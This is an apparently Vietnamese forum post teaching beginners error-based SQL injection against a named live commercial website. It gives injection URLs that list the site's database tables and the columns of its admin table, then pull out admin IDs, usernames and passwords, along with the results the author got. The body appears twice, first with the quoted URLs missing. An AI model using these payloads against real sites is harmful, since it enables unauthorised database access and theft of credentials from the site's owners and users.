Khai thác web lỗi SQL cơ bản
Hic
dạo này được xcross cho theo học SQL đưa ra toàn site to và đẹp, hacked
thì ít mà lấy được chút thông tin nhạy cảm lại là đa sô
Lần này victim là :
Link dính SQL inject nè các anh em :
Result:
Quen thuộc quá phải không
Lấy hết table nha ! Ở bk2.vn các bạn có thể query bình thường để lấy thông tin tables và columns ... ngoài ra các bạn cũng có thể dùng advance SQL cho nhanh -> muốn xài được advance SQL các bạn tự tìm bug trên đó nha
Ở đây mình viết các query basic cho các bạn chưa biết gì tham khảo còn các bạn khác thì chắc dùng tool luôn chứ chả mấy khi query hands made nhỉ
Table đầu tiên nha:
Kết quả :
Lấy table thứ 2 nhá:
Kết quả là :
Table 3 nha:
Kết quả là:
làm tương tự sẽ dẫn chúng ta đi hết con đường này, content tables:
Hè hè thấy cái table admin là ham rùi thui lấy columns trên table này nhé
Kết quả:
Columns tiếp theo nha:
Kết quả:
Tương tự ta thu được chọn gói columns của table admin
Lấy info nào
Kết quả là của các bạn. Ai làm đúng được khen
bài này chỉ dừng ở đây nếu ai làm ko ra thì kiếm tut khác cùng thể loại để đọc nha. Mình chỉ muốn các bạn mới làm quen với SQL injection học thuộc mấy cái query trên thôi.
thank for reading
Lần này victim là :
Trích:
http://www.bk2.vn |
Result:
Trích:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /danhsach_sp.asp, line 251 |
Lấy hết table nha ! Ở bk2.vn các bạn có thể query bình thường để lấy thông tin tables và columns ... ngoài ra các bạn cũng có thể dùng advance SQL cho nhanh -> muốn xài được advance SQL các bạn tự tìm bug trên đó nha
Ở đây mình viết các query basic cho các bạn chưa biết gì tham khảo còn các bạn khác thì chắc dùng tool luôn chứ chả mấy khi query hands made nhỉ
Table đầu tiên nha:
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password |
Trích:
admin |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('admin')))--sp_password |
Trích:
customer |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('admin','customer')))--sp_password |
Trích:
viewOrder |
Trích:
'admin/category/customer/dtproperties/feedback/logo/news/orderDetail/orders/product/subCategory/sysconstraints/syssegments/viewOrder/viewTop10/' |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin'))--sp_password |
Trích:
ad_name |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin' and column_name not in('ad_name')))--sp_password |
Trích:
ad_pass |
Trích:
'ad_id/ad_name/ad_pass/' |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,ad_id),'NUL L')) %2b'/'%2bconvert(varchar,isnull(convert(varchar, ad_name),'NULL')) %2b'/'%2bconvert(varchar,isnull(convert(varchar, ad_pass),'NULL')) from admin order by ad_id asc))--sp_password |
bài này chỉ dừng ở đây nếu ai làm ko ra thì kiếm tut khác cùng thể loại để đọc nha. Mình chỉ muốn các bạn mới làm quen với SQL injection học thuộc mấy cái query trên thôi.
thank for reading
No comments: